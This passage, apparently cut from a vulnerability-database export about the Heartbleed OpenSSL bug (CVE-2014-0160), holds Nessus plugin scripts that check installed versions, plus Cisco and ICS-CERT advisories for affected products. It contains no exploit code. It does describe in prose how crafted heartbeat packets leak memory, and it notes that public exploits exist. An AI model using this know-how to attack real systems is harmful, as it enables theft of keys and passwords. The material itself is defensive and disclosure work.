TRUE\n);\nhotfix_check_fversion_end();\n\nversion = join(ver['value'], sep:\".\");\n\n# Vendor patch contains Openssl.dll version 14.1.411.0\nif (ver_compare(ver:version, fix:\"14.1.411.0\", strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n File : ' + exe +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.1.411.0 (Reflection X 14.1 SP3 Update 1 / 14.1.3.247)' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"openssl.dll\", version, path);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:15", "references": ["https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "https://www.openssl.org/news/secadv/20140407.txt", "https://bto.bluecoat.com/security-advisory/sa79", "http://www.heartbleed.com"], "pluginID": "73515", "description": "The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 7, "reporter": "Tenable", "published": "2014-04-15T00:00:00", "title": "Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Firewalls", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/o:bluecoat:sgos"], "id": "BLUECOAT_PROXY_SG_6_5_3_6.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73515);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the Blue Coat ProxySG SGOS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is potentially affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bto.bluecoat.com/security-advisory/sa79\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 6.5.3.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:bluecoat:sgos\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/15\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Firewalls\");\n\n script_dependencies(\"bluecoat_proxy_sg_version.nasl\");\n script_require_keys(\"Host/BlueCoat/ProxySG/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/BlueCoat/ProxySG/Version\");\nui_version = get_kb_item(\"Host/BlueCoat/ProxySG/UI_Version\");\n\nif (version =~ \"^6\\.5\\.3($|[^0-9])\")\n{\n fix = '6.5.3.6';\n ui_fix = '6.5.3.6 Build 0';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n # Select format for output\n if (isnull(ui_version))\n {\n report_ver = version;\n report_fix = fix;\n }\n else\n {\n report_ver = ui_version;\n report_fix = ui_fix;\n }\n\n report =\n '\\n Installed version : ' + report_ver +\n '\\n Fixed version : ' + report_fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:21", "references": ["https://kc.mcafee.com/corporate/index?page=content&id=SB10071", "https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "pluginID": "73834", "description": "The remote host has a version of McAfee Firewall Enterprise installed\nthat is affected by an out-of-bounds read error, known as Heartbleed,\nin the TLS/DTLS implementation due to improper handling of TLS\nheartbeat extension packets. A remote attacker, using crafted packets,\ncan trigger a buffer over-read, resulting in the disclosure of up to\n64KB of process memory, which contains sensitive information such as\nprimary key material, secondary key material, and other protected\ncontent.", "edition": 8, "reporter": "Tenable", "published": "2014-05-02T00:00:00", "title": "McAfee Firewall Enterprise OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Firewalls", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-07-14T00:00:00", "cpe": ["x-cpe:/a:mcafee:firewall_enterprise"], "id": "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73834", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(73834);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee Firewall Enterprise OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks version of MFE.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Firewall Enterprise installed\nthat is affected by an out-of-bounds read error, known as Heartbleed,\nin the TLS/DTLS implementation due to improper handling of TLS\nheartbeat extension packets. A remote attacker, using crafted packets,\ncan trigger a buffer over-read, resulting in the disclosure of up to\n64KB of process memory, which contains sensitive information such as\nprimary key material, secondary key material, and other protected\ncontent.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Apply 8.3.2 ePatch 14 per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:mcafee:firewall_enterprise\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_firewall_enterprise_version.nbin\");\n script_require_keys(\"Host/McAfeeFE/version\", \"Host/McAfeeFE/version_display\", \"Host/McAfeeFE/installed_patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Firewall Enterprise\";\nversion = get_kb_item_or_exit(\"Host/McAfeeFE/version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfeeFE/version_display\");\ninstalled_patches = get_kb_item_or_exit(\"Host/McAfeeFE/installed_patches\");\nhotfix = \"8.3.2E14\";\nhotfix_display = \"8.3.2 ePatch 14\";\n\n# Only 8.3.2 is affected. Furthermore, only Patch level 2 and below are affected.\nif (version !~ \"^8\\.3\\.2\\.\" || ver_compare(ver:version, fix:\"8.3.2.2\", strict:FALSE) == 1) audit(AUDIT_INST_VER_NOT_VULN, version_display);\n\nif (hotfix >!< installed_patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed Version : ' + version_display +\n '\\n Patched Version : ' + hotfix_display +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix_display,app_name);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cisco": [{"lastseen": "2017-09-26T15:33:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.cisco.CiscoBulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed"], "description": "A vulnerability in the Transport Layer Security (TLS)/Datagram Transport Layer Security (DTLS) heartbeat functionality in OpenSSL used in multiple Cisco products could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or DTLS client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. The attacker could then send a specially-crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nMultiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or Datagram Transport Layer Security (DTLS) client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. An exploit could send a specially crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nPlease note that the devices that are affected by this vulnerability are the devices acting as an SSL server terminating SSL connections or devices acting as an SSL Client initiating an SSL connection. Devices that are simply traversed by SSL traffic without terminating it are not affected.\n\nThis advisory will be updated as additional information becomes available. Cisco will release software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities may be available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\"]", "reporter": "Cisco", "published": "2014-04-09T03:00:00", "type": "cisco", "title": "OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Cisco TelePresence Video Communication Server (VCS)", "version": "any", "operator": "eq"}, {"name": "Cisco Desktop Collaboration Experience DX650 Software", "version": "any", "operator": "eq"}, {"name": "Cisco Unified IP Phones 9900 Series Firmware", "version": "any", "operator": "eq"}, {"name": "Cisco Unified IP Phone 8945", "version": "any", "operator": "eq"}], "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2014-10-29T16:11:45", "id": "CISCO-SA-20140409-HEARTBLEED", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-26T15:33:56", "_object_types": ["robots.models.base.Bulletin", "robots.models.cisco.CiscoBulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140408-CVE-2014-0160"], "description": "A vulnerability in the Transport Layer Security (TLS)/Datagram Transport Layer Security (DTLS) heartbeat functionality in OpenSSL used in multiple Cisco products could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or DTLS client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. The attacker could then send a specially-crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nFunctional code that exploits this vulnerability is available as part of the Metasploit framework.\n\nOpenSSL has confirmed the vulnerability and released software updates.\n\nAn attacker could exploit this vulnerability to access memory from an application that uses an affected version of OpenSSL in chunks of 64k; however, repeated exploitation could allow the attacker to retrieve additional memory to further retrieve sensitive information. However, widespread attacks have not been detected or reported.\n\nA secondary impact of the vulnerability, the compromise of certificate secret key information, could allow attackers to decrypt captured network traffic, whether stored or in transit. Attackers also require a privileged position in the network to capture network traffic, increasing the difficulty of leveraging information gained from exploits against the vulnerability.\n\nIf sites are using SSL certificates for authentication, attackers could use stolen secret keys to impersonate a trusted host, possibly for use as part of phishing or spoofing attacks.\n\nCVSS temporal scoring metrics on this vulnerability reflect software products affected by the vulnerability that have no available software updates. Products with available software updates have a reduced temporal score.", "reporter": "Cisco", "published": "2014-04-08T14:39:29", "type": "cisco", "title": "OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Cisco TelePresence Video Communication Server (VCS)", "version": "any", "operator": "eq"}, {"name": "Cisco Desktop Collaboration Experience DX650 Software", "version": "any", "operator": "eq"}, {"name": "Cisco Unified IP Phones 9900 Series Firmware", "version": "any", "operator": "eq"}, {"name": "Cisco Unified IP Phone 8945", "version": "any", "operator": "eq"}], "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2014-07-09T16:11:35", "id": "CISCO-SA-20140408-CVE-2014-0160", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140408-CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ics": [{"lastseen": "2018-08-31T01:37:26", "references": ["https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx", "http://ics-cert.us-cert.gov/content/recommended-practices", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-02", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-135-02 Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-02&site_name=ICS-CERT", "https://ics-cert.us-cert.gov/Report-Incident?", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-135-02 Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-02&site_name=ICS-CERT", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://auth.tableausoftware.com/user/login?", "http://ics-cert.us-cert.gov/", "http://www.tableausoftware.com/support/releases", "http://cwe.mitre.org/data/definitions/119.html", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-02", "http://www.us-cert.gov/privacy/", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-02", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-135-02 Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-02&site_name=ICS-CERT", "http://www.dhs.gov", "http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "http://www.dhs.gov/report-cyber-risks", "https://licensing.tableausoftware.com/esdalt/"], "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERb\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160c has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications are revoked, new certificates re\u2011acquired, and used after patching the vulnerability.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.](<http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>) ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. Tableau Software release notes <http://www.tableausoftware.com/support/releases>, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed May 15, 2014.\n * c. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed May 15, 2014.\n * d. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last accessed May 15, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-05-15T00:00:00", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-08-27T00:00:00", "id": "ICSA-14-135-02", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-135-02", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:37:38", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-114-01", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-114-01 Certec atvise scada OpenSSL Heartbleed Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-114-01&site_name=ICS-CERT", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-114-01 Certec atvise scada OpenSSL Heartbleed Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-114-01&site_name=ICS-CERT", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-114-01", "http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/AU:N/C:P/I:N/A:N", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-114-01", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-114-01 Certec atvise scada OpenSSL Heartbleed Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-114-01&site_name=ICS-CERT", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://www.atvise.com/en/component/phocadownload/category/2-products?download=181:patch-openssl", "http://ics-cert.us-cert.gov/", "http://cwe.mitre.org/data/definitions/119.html", "http://www.us-cert.gov/privacy/", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Certec has released new libraries that mitigate the OpenSSL Heartbleed vulnerability in atvise scada.\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nCertec reports that the vulnerability affects the following versions of atvise scada:\n\n * atvise scada Versions 2.3 and above.\n\n## IMPACT\n\nAn attacker exploiting the OpenSSL Heartbleed vulnerability may be able to obtain private keys of the target system. The attacker could then use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nCertec EDV GmbH is based in Austria.\n\nThe affected product, atvise, is web-based human-machine interface supervisory control and data acquisition (HMI SCADA) systems. According to Certec, atvise is deployed in every field of industrial automation. Certec states that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe atvise scada uses the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the Heartbleed vulnerability.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPOLIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this 